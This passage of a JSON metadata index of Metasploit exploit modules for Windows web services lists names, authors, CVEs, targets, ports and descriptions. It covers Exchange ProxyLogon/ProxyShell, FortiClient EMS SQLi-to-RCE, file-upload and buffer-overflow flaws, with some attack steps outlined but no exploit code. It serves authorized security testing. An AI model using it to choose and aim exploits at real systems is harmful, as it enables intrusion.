"/modules/exploits/windows/http/efs_easychatserver_username.rb", - "is_install_path": true, - "ref_name": "windows/http/efs_easychatserver_username", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/efs_fmws_userid_bof": { - "name": "Easy File Management Web Server Stack Buffer Overflow", - "fullname": "exploit/windows/http/efs_fmws_userid_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-05-20", - "type": "exploit", - "author": [ - "superkojiman", - "Julien Ahrens", - "TecR0c " - ], - "description": "Easy File Management Web Server v4.0 and v5.3 contains a stack buffer\n overflow condition that is triggered as user-supplied input is not\n properly validated when handling the UserID cookie. This may allow a\n remote attacker to execute arbitrary code.", - "references": [ - "CVE-2014-3791", - "OSVDB-107241", - "EDB-33610", - "BID-67542", - "URL-http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536", - "URL-http://www.web-file-management.com/" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "Efmws 5.3 Universal", - "Efmws 4.0 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/efs_fmws_userid_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/efs_fmws_userid_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ektron_xslt_exec": { - "name": "Ektron 8.02 XSLT Transform Remote Code Execution", - "fullname": "exploit/windows/http/ektron_xslt_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-10-16", - "type": "exploit", - "author": [ - "Rich Lundeen", - "juan vazquez ", - "Nicolas \"Nicob\" Gregoire" - ], - "description": "This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The\n vulnerability exists due to the insecure usage of XslCompiledTransform, using a\n XSLT controlled by the user. The module has been tested successfully on Ektron CMS\n 8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK\n SERVICE privileges.", - "references": [ - "CVE-2012-5357", - "OSVDB-88107", - "URL-http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/", - "URL-http://technet.microsoft.com/en-us/security/msvr/msvr12-016" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2003 SP2 / Ektron CMS400 8.02" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/http/ektron_xslt_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/ektron_xslt_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ektron_xslt_exec_ws": { - "name": "Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution", - "fullname": "exploit/windows/http/ektron_xslt_exec_ws", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-02-05", - "type": "exploit", - "author": [ - "catatonicprime" - ], - "description": "Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have\nvulnerabilities in various operations within the ServerControlWS.asmx\nweb services. These vulnerabilities allow for RCE without authentication and\nexecute in the context of IIS on the remote system.", - "references": [ - "CVE-2015-0923", - "US-CERT-VU-377644", - "URL-http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2008 R2 / Ektron CMS400 8.5" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ektron_xslt_exec_ws.rb", - "is_install_path": true, - "ref_name": "windows/http/ektron_xslt_exec_ws", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ericom_access_now_bof": { - "name": "Ericom AccessNow Server Buffer Overflow", - "fullname": "exploit/windows/http/ericom_access_now_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-06-02", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow in Ericom AccessNow Server. The\n vulnerability is due to an insecure usage of vsprintf with user controlled data,\n which can be triggered with a malformed HTTP request. This module has been tested\n successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003\n Server SP2.", - "references": [ - "ZDI-14-160", - "CVE-2014-3913", - "BID-67777", - "URL-http://www.ericom.com/security-ERM-2014-610.asp" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ericom_access_now_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/ericom_access_now_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/exchange_chainedserializationbinder_rce": { - "name": "Microsoft Exchange Server ChainedSerializationBinder RCE", - "fullname": "exploit/windows/http/exchange_chainedserializationbinder_rce", - "aliases": [ - "exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce" - ], - "rank": 600, - "disclosure_date": "2021-12-09", - "type": "exploit", - "author": [ - "pwnforsp", - "zcgonvh", - "Microsoft Threat Intelligence Center", - "Microsoft Security Response Center", - "peterjson", - "testanull", - "Grant Willcox", - "Spencer McIntyre", - "Markus Wulftange" - ], - "description": "This module exploits vulnerabilities within the ChainedSerializationBinder as used in\n Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and\n Exchange Server 2016 CU22 all prior to Mar22SU.\n\n Note that authentication is required to exploit these vulnerabilities.", - "references": [ - "CVE-2021-42321", - "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321", - "URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7", - "URL-https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169", - "URL-https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398", - "URL-https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852", - "CVE-2022-23277", - "URL-https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html", - "URL-https://testbnull.medium.com/note-nhanh-v%E1%BB%81-binaryformatter-binder-v%C3%A0-cve-2022-23277-6510d469604c" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2022-08-17 17:36:31 +0000", - "path": "/modules/exploits/windows/http/exchange_chainedserializationbinder_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/exchange_chainedserializationbinder_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/exchange_ecp_dlp_policy": { - "name": "Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE", - "fullname": "exploit/windows/http/exchange_ecp_dlp_policy", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-01-12", - "type": "exploit", - "author": [ - "Leonard Rapp", - "Markus Vervier", - "Steven Seeley", - "Yasar Klawohn", - "wvu ", - "Spencer McIntyre" - ], - "description": "This vulnerability allows remote attackers to execute arbitrary code\n on affected installations of Exchange Server. Authentication is\n required to exploit this vulnerability. Additionally, the target user\n must have the \"Data Loss Prevention\" role assigned and an active\n mailbox.\n\n If the user is in the \"Compliance Management\" or greater \"Organization\n Management\" role groups, then they have the \"Data Loss Prevention\"\n role. Since the user who installed Exchange is in the \"Organization\n Management\" role group, they transitively have the \"Data Loss\n Prevention\" role.\n\n The specific flaw exists within the processing of the New-DlpPolicy\n cmdlet. The issue results from the lack of proper validation of\n user-supplied template data when creating a DLP policy. An attacker\n can leverage this vulnerability to execute code in the context of\n SYSTEM.\n\n Tested against Exchange Server 2016 CU19 on Windows Server 2016.", - "references": [ - "CVE-2020-16875", - "CVE-2020-17132", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875", - "URL-https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016", - "URL-https://srcincite.io/advisories/src-2020-0019/", - "URL-https://srcincite.io/pocs/cve-2020-16875.py.txt", - "URL-https://srcincite.io/pocs/cve-2020-16875.ps1.txt", - "URL-https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html", - "URL-https://www.x41-dsec.de/security/advisory/exploit/research/2020/12/21/x41-microsoft-exchange-rce-dlp-bypass/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Exchange Server <= 2016 CU19 and 2019 CU8" - ], - "mod_time": "2021-04-29 21:26:02 +0000", - "path": "/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb", - "is_install_path": true, - "ref_name": "windows/http/exchange_ecp_dlp_policy", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "account-lockouts", - "config-changes", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/exchange_ecp_viewstate": { - "name": "Exchange Control Panel ViewState Deserialization", - "fullname": "exploit/windows/http/exchange_ecp_viewstate", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-02-11", - "type": "exploit", - "author": [ - "Spencer McIntyre" - ], - "description": "This module exploits a .NET serialization vulnerability in the\n Exchange Control Panel (ECP) web page. The vulnerability is due to\n Microsoft Exchange Server not randomizing the keys on a\n per-installation basis resulting in them using the same validationKey\n and decryptionKey values. With knowledge of these values, an attacker\n can craft a special ViewState to cause an OS command to be executed\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.", - "references": [ - "CVE-2020-0688", - "URL-https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (x86)", - "Windows (x64)", - "Windows (cmd)" - ], - "mod_time": "2020-08-21 10:13:45 +0000", - "path": "/modules/exploits/windows/http/exchange_ecp_viewstate.rb", - "is_install_path": true, - "ref_name": "windows/http/exchange_ecp_viewstate", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/exchange_proxylogon_rce": { - "name": "Microsoft Exchange ProxyLogon RCE", - "fullname": "exploit/windows/http/exchange_proxylogon_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-03-02", - "type": "exploit", - "author": [ - "Orange Tsai", - "Jang ( ", - "mekhalleh (RAMELLA Sébastien)", - "print(\"\")", - "lotusdll", - "Praetorian" - ], - "description": "This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.", - "references": [ - "CVE-2021-26855", - "CVE-2021-27065", - "LOGO-https://proxylogon.com/images/logo.jpg", - "URL-https://proxylogon.com/", - "URL-http://aka.ms/exchangevulns", - "URL-https://www.praetorian.com/blog/reproducing-proxylogon-exploit", - "URL-https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265", - "URL-https://www.o2oxy.cn/3169.html", - "URL-https://github.com/praetorian-inc/proxylogon-exploit", - "URL-https://github.com/Zeop-CyberSec/proxylogon_writeup" - ], - "platform": "Windows", - "arch": "cmd, x64, x86", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Powershell", - "Windows Dropper", - "Windows Command" - ], - "mod_time": "2023-02-08 15:20:32 +0000", - "path": "/modules/exploits/windows/http/exchange_proxylogon_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/exchange_proxylogon_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ], - "AKA": [ - "ProxyLogon" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/exchange_proxynotshell_rce": { - "name": "Microsoft Exchange ProxyNotShell RCE", - "fullname": "exploit/windows/http/exchange_proxynotshell_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-09-28", - "type": "exploit", - "author": [ - "Orange Tsai", - "Spencer McIntyre", - "DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q", - "Piotr Bazydło", - "Rich Warren", - "Soroush Dalili" - ], - "description": "This module chains two vulnerabilities on Microsoft Exchange Server\n that, when combined, allow an authenticated attacker to interact with\n the Exchange Powershell backend (CVE-2022-41040), where a\n deserialization flaw can be leveraged to obtain code execution\n (CVE-2022-41082). This exploit only support Exchange Server 2019.\n\n These vulnerabilities were patched in November 2022.", - "references": [ - "CVE-2022-41040", - "CVE-2022-41082", - "URL-https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend", - "URL-https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", - "URL-https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9", - "URL-https://rw.md/2022/11/09/ProxyNotRelay.html" - ], - "platform": "Windows", - "arch": "cmd, x64, x86", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Dropper", - "Windows Command" - ], - "mod_time": "2022-11-28 10:06:14 +0000", - "path": "/modules/exploits/windows/http/exchange_proxynotshell_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/exchange_proxynotshell_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "AKA": [ - "ProxyNotShell" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/exchange_proxyshell_rce": { - "name": "Microsoft Exchange ProxyShell RCE", - "fullname": "exploit/windows/http/exchange_proxyshell_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-04-06", - "type": "exploit", - "author": [ - "Orange Tsai", - "Jang ( ", - "PeterJson", - "brandonshi123", - "mekhalleh (RAMELLA Sébastien)", - "Donny Maasland", - "Rich Warren", - "Spencer McIntyre", - "wvu " - ], - "description": "This module exploits a vulnerability on Microsoft Exchange Server that\n allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an\n arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15,\n Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5,\n Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9.\n\n All components are vulnerable by default.", - "references": [ - "CVE-2021-34473", - "CVE-2021-34523", - "CVE-2021-31207", - "URL-https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "URL-https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf", - "URL-https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/", - "URL-https://github.com/dmaasland/proxyshell-poc" - ], - "platform": "Windows", - "arch": "cmd, x64, x86", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Powershell", - "Windows Dropper", - "Windows Command" - ], - "mod_time": "2022-12-02 15:55:10 +0000", - "path": "/modules/exploits/windows/http/exchange_proxyshell_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/exchange_proxyshell_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "AKA": [ - "ProxyShell" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/ezserver_http": { - "name": "EZHomeTech EzServer Stack Buffer Overflow Vulnerability", - "fullname": "exploit/windows/http/ezserver_http", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-18", - "type": "exploit", - "author": [ - "modpr0be " - ], - "description": "This module exploits a stack buffer overflow in the EZHomeTech EZServer\n for versions 6.4.017 and earlier. If a malicious user sends packets\n containing an overly long string, it may be possible to execute a\n payload remotely. Due to size constraints, this module uses the\n Egghunter technique.", - "references": [ - "OSVDB-83065", - "BID-54056", - "EDB-19266", - "URL-http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/" - ], - "platform": "Windows", - "arch": "", - "rport": 8000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ezserver_http.rb", - "is_install_path": true, - "ref_name": "windows/http/ezserver_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/fdm_auth_header": { - "name": "Free Download Manager Remote Control Server Buffer Overflow", - "fullname": "exploit/windows/http/fdm_auth_header", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-02-02", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Free Download Manager\n Remote Control 2.5 Build 758. When sending a specially crafted\n Authorization header, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2009-0183", - "OSVDB-51745" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Free Download Manager 2.5 Build 758" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/fdm_auth_header.rb", - "is_install_path": true, - "ref_name": "windows/http/fdm_auth_header", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/file_sharing_wizard_seh": { - "name": "File Sharing Wizard - POST SEH Overflow", - "fullname": "exploit/windows/http/file_sharing_wizard_seh", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-09-24", - "type": "exploit", - "author": [ - "x00pwn", - "Dean Welch " - ], - "description": "This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.", - "references": [ - "CVE-2019-16724", - "EDB-47412" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Vista / Windows 7 (x86)" - ], - "mod_time": "2020-03-05 14:48:37 +0000", - "path": "/modules/exploits/windows/http/file_sharing_wizard_seh.rb", - "is_install_path": true, - "ref_name": "windows/http/file_sharing_wizard_seh", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/flexdotnetcms_upload_exec": { - "name": "FlexDotnetCMS Arbitrary ASP File Upload", - "fullname": "exploit/windows/http/flexdotnetcms_upload_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-09-28", - "type": "exploit", - "author": [ - "Erik Wynter" - ], - "description": "This module exploits an arbitrary file upload vulnerability in\n FlexDotnetCMS v1.5.8 and prior in order to execute arbitrary\n commands with elevated privileges.\n\n The module first tries to authenticate to FlexDotnetCMS via an HTTP\n POST request to `/login`. It then attempts to upload a random TXT\n file and subsequently uses the FlexDotnetCMS file editor to rename\n the TXT file to an ASP file. If this succeeds, the target is\n vulnerable and the ASP file is generated as a copy of the TXT file,\n which remains on the server.\n\n Next, the module sends another request to rename the TXT file to an\n ASP file, this time adding the payload. Finally, the module tries\n to execute the ASP payload via a simple HTTP GET request to\n `/media/uploads/asp_payload`\n\n Valid credentials for a FlexDotnetCMS user with permissions to use\n the FileManager are required. This module has been successfully\n tested against FlexDotnetCMS v1.5.8 running on Windows Server 2012.", - "references": [ - "CVE-2020-27386" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (x86)", - "Windows (x64)" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/flexdotnetcms_upload_exec", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/forticlient_ems_fctid_sqli": { - "name": "FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE", - "fullname": "exploit/windows/http/forticlient_ems_fctid_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-04-21", - "type": "exploit", - "author": [ - "Zach Hanley", - "James Horseman", - "jheysel-r7", - "Spencer McIntyre" - ], - "description": "An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).\n FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized\n platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which\n can be sent directly into database queries.\n\n FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013\n and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.\n In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable\n SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code\n execution in the context of NT AUTHORITY\\SYSTEM\n\n Affected versions of FortiClient EMS include:\n 7.2.0 through 7.2.2\n 7.0.1 through 7.0.10\n\n Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.\n\n It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient\n EMS for the necessary vulnerable services to be available.", - "references": [ - "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/", - "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-revisiting-fortinet-forticlient-ems-to-exploit-7-2-x/", - "URL-https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py", - "CVE-2023-48788" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8013, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2024-07-25 09:14:27 +0000", - "path": "/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb", - "is_install_path": true, - "ref_name": "windows/http/forticlient_ems_fctid_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/fortilogger_arbitrary_fileupload": { - "name": "FortiLogger Arbitrary File Upload Exploit", - "fullname": "exploit/windows/http/fortilogger_arbitrary_fileupload", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-02-26", - "type": "exploit", - "author": [ - "Berkan Er " - ], - "description": "This module exploits an unauthenticated arbitrary file upload\n via insecure POST request. It has been tested on versions < 5.2.0 in\n Windows 10 Enterprise.", - "references": [ - "CVE-2021-3378", - "URL-https://erberkan.github.io/2021/cve-2021-3378/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 5000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "FortiLogger < 5.2.0" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb", - "is_install_path": true, - "ref_name": "windows/http/fortilogger_arbitrary_fileupload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "unreliable-session" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/generic_http_dll_injection": { - "name": "Generic Web Application DLL Injection", - "fullname": "exploit/windows/http/generic_http_dll_injection", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-03-04", - "type": "exploit", - "author": [ - "Matthew Hall " - ], - "description": "This is a general-purpose module for exploiting conditions where a HTTP request\n triggers a DLL load from an specified SMB share. This module serves payloads as\n DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would\n trigger the load of the DLL.", - "references": [ - "CWE-427" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/generic_http_dll_injection.rb", - "is_install_path": true, - "ref_name": "windows/http/generic_http_dll_injection", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/geutebrueck_gcore_x64_rce_bo": { - "name": "Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE", - "fullname": "exploit/windows/http/geutebrueck_gcore_x64_rce_bo", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-01-24", - "type": "exploit", - "author": [ - "Luca Cappiello", - "Maurice Popp" - ], - "description": "This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe).\n The vulnerable webserver is running on Port 13003 and Port 13004, does not require\n authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).", - "references": [ - "EDB-41153", - "CVE-2017-11517", - "URL-https://www.geutebrueck.com" - ], - "platform": "Windows", - "arch": "", - "rport": 13003, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic Targeting", - "GCore 1.3.8.42, Windows x64 (Win7+)", - "GCore 1.4.2.37, Windows x64 (Win7+)" - ], - "mod_time": "2024-04-17 13:00:41 +0000", - "path": "/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb", - "is_install_path": true, - "ref_name": "windows/http/geutebrueck_gcore_x64_rce_bo", 